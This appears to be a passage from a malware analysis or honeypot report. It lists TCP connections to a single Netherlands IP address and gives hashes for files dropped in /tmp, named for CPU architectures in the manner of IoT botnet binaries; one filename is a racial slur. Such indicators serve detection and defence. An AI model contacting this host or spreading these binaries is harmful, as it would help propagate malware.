| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp |
Files
/tmp/boobs
| MD5 | 1f918589efbef4b04e806b7a38fc63f8 |
| SHA1 | 758f7a47b66a52ce59462ffd1c0f223af618077c |
| SHA256 | 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4 |
| SHA512 | d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb |
/tmp/boobs2
| MD5 | 348a8f1c5535fe6a0a698f457c329485 |
| SHA1 | a3415c48c1d18776ab9a02ef23fe65cef88af354 |
| SHA256 | c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8 |
| SHA512 | e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c |
/tmp/roof
| MD5 | ca477454b7145f6d2180e32c6f0135f6 |
| SHA1 | da25e63ea1e5fed9abf321ddf4a82eaa76717bb6 |
| SHA256 | 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4 |
| SHA512 | 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80 |
/tmp/ppc
| MD5 | 5cf85a36699cca11be8c96c3232654e0 |
| SHA1 | 897379599414d22c9adf9b542266eb6b888b6542 |
| SHA256 | d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419 |
| SHA512 | de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552 |
/tmp/sparc
| MD5 | 0e2c431d0b76d5d91af24cd90532cd93 |
| SHA1 | 402554d878c7e73cdf145bb249c604a21e465e1f |
| SHA256 | 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257 |
| SHA512 | 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc |
/tmp/darkness
| MD5 | 24393febb5e8a233a8df7f00b8c3b147 |
| SHA1 | f8240c5256c8a193ee8f2f93880203eca2f827d5 |
| SHA256 | 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42 |
| SHA512 | be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6 |
/tmp/arm5
| MD5 | e57c0097d80d17a52aad01a8c2e4f9fc |
| SHA1 | fffadcdb51b879236df4d4cdf373216dd926e90e |
| SHA256 | 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a |
| SHA512 | 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464 |
/tmp/arm6
| MD5 | 1e78f279e22858585947a52ad8b127d7 |
| SHA1 | 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7 |
| SHA256 | 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377 |
| SHA512 | 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921 |
/tmp/NIGGA7
| MD5 | 658e8ab8f1bf7db543aa9b2b2fd595ce |
| SHA1 | ce122d9bc9920bbd77826fcd7676f3081ec19752 |
| SHA256 | 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c |
| SHA512 | eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f |